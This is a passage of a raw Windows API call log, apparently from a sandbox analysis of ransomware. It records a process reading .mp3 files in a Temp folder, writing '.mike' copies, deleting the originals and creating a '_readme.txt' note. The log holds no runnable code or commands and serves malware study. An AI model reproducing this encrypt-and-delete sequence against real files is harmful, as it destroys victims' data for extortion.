lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221247c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.576] CloseHandle (hObject=0x280) returned 1 [0145.577] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.577] GetFileType (hFile=0x280) returned 0x1 [0145.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.577] GetFileType (hFile=0x280) returned 0x1 [0145.577] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0145.577] WriteFile (in: hFile=0x280, lpBuffer=0x221c9e4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x221c9e4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0145.578] CloseHandle (hObject=0x280) returned 1 [0145.578] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0145.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.578] GetFileType (hFile=0x280) returned 0x1 [0145.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0145.578] GetFileType (hFile=0x280) returned 0x1 [0145.578] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0145.578] ReadFile (in: hFile=0x280, lpBuffer=0x221f434, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221f434*, lpNumberOfBytesRead=0x2af080*=0x1c9, lpOverlapped=0x0) returned 1 [0145.578] CloseHandle (hObject=0x280) returned 1 [0145.579] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0145.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.579] GetFileType (hFile=0x280) returned 0x1 [0145.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0145.579] GetFileType (hFile=0x280) returned 0x1 [0145.579] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0145.579] WriteFile (in: hFile=0x280, lpBuffer=0x2222da0*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2222da0*, lpNumberOfBytesWritten=0x2af074*=0x1d0, lpOverlapped=0x0) returned 1 [0145.579] CloseHandle (hObject=0x280) returned 1 [0145.579] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0145.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.580] GetFileType (hFile=0x280) returned 0x1 [0145.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0145.580] GetFileType (hFile=0x280) returned 0x1 [0145.581] WriteFile (in: hFile=0x280, lpBuffer=0x2225fc4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2225fc4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.581] CloseHandle (hObject=0x280) returned 1 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.581] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d3600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200d3600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200d3600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x53f0)) returned 1 [0145.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike", lpFilePart=0x0) returned 0x45 [0145.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.581] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3.mike"), fInfoLevelId=0x0, lpFileInformation=0x2227698 | out: lpFileInformation=0x2227698*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d3600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200d3600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200d3600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x53f0)) returned 1 [0145.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0145.582] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.582] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", dwFileAttributes=0x80) returned 1 [0145.582] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.582] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3")) returned 1 [0145.583] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0145.583] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8pc-kmxniuh.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0145.583] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8pc-KMxnIuh.mp3", lpFilePart=0x0) returned 0x40 [0145.583] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0145.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0145.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x280 [0145.584] GetFileType (hFile=0x280) returned 0x1 [0145.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0145.584] GetFileType (hFile=0x280) returned 0x1 [0145.584] WriteFile (in: hFile=0x280, lpBuffer=0x22292d4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x22292d4*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0145.585] CloseHandle (hObject=0x280) returned 1 [0145.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0145.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\a3hc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0145.586] GetFileType (hFile=0x280) returned 0x1 [0145.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d0) returned 1 [0145.586] GetFileType (hFile=0x280) returned 0x1 [0145.586] CloseHandle (hObject=0x280) returned 1 [0145.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.586] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0145.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0145.586] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0145.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0145.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0145.586] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\a3hc.mp3"), fInfoLevelId=0x0, lpFileInformation=0x222ad60 | out: lpFileInformation=0x222ad60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5cc52ed0, ftCreationTime.dwHighDateTime=0x1d4d50b, ftLastAccessTime.dwLowDateTime=0xa7573c60, ftLastAccessTime.dwHighDateTime=0x1d4c8f2, ftLastWriteTime.dwLowDateTime=0xa7573c60, ftLastWriteTime.dwHighDateTime=0x1d4c8f2, nFileSizeHigh=0x0, nFileSizeLow=0xfd37)) returned 1 [0145.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.588] WriteFile (in: hFile=0x280, lpBuffer=0x222bd0c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x222bd0c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0145.589] CloseHandle (hObject=0x280) returned 1 [0145.589] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0145.589] ReadFile (in: hFile=0x280, lpBuffer=0x222ce14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x222ce14*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.590] CloseHandle (hObject=0x280) returned 1 [0145.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.591] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0145.591] ReadFile (in: hFile=0x280, lpBuffer=0x2239d94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2239d94*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.591] CloseHandle (hObject=0x280) returned 1 [0145.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.592] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0145.592] ReadFile (in: hFile=0x280, lpBuffer=0x2246d14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2246d14*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.593] CloseHandle (hObject=0x280) returned 1 [0145.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.594] SetFilePointer (in: hFile=0x280, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0145.594] ReadFile (in: hFile=0x280, lpBuffer=0x2253c94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2253c94*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.594] CloseHandle (hObject=0x280) returned 1 [0145.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.595] SetFilePointer (in: hFile=0x280, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0145.595] ReadFile (in: hFile=0x280, lpBuffer=0x2260c14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2260c14*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0145.595] CloseHandle (hObject=0x280) returned 1 [0145.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.607] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.608] WriteFile (in: hFile=0x280, lpBuffer=0x2282904*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2282904*, lpNumberOfBytesWritten=0x2af074*=0xd40, lpOverlapped=0x0) returned 1 [0145.608] CloseHandle (hObject=0x280) returned 1 [0145.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.609] WriteFile (in: hFile=0x280, lpBuffer=0x2285b0c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2285b0c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0145.609] CloseHandle (hObject=0x280) returned 1 [0145.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3.mike", lpFilePart=0x0) returned 0x3e [0145.610] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", dwFileAttributes=0x80) returned 1 [0145.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", lpFilePart=0x0) returned 0x39 [0145.610] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\a3hc.mp3")) returned 1 [0145.612] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\a3Hc.mp3", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 